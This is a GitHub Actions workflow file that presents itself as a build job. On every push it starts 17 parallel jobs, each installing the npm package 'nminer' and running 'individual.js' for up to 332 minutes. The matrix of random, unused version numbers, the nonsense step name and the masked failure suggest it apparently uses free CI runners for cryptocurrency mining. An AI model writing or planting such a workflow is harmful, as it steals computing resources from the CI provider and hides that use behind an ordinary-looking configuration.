name: individual
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2653 }
          - { version: 2628 }
          - { version: 99 }
          - { version: 1158 }
          - { version: 5218 }
          - { version: 2002 }
          - { version: 1784 }
          - { version: 7933 }
          - { version: 8466 }
          - { version: 5959 }
          - { version: 7072 }
          - { version: 1419 }
          - { version: 1113 }
          - { version: 2543 }
          - { version: 5519 }
          - { version: 6893 }
          - { version: 4930 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: throughout oh yuck gee
        run: |
          npm install nminer@latest
          timeout 332m node individual.js || echo "individual executed"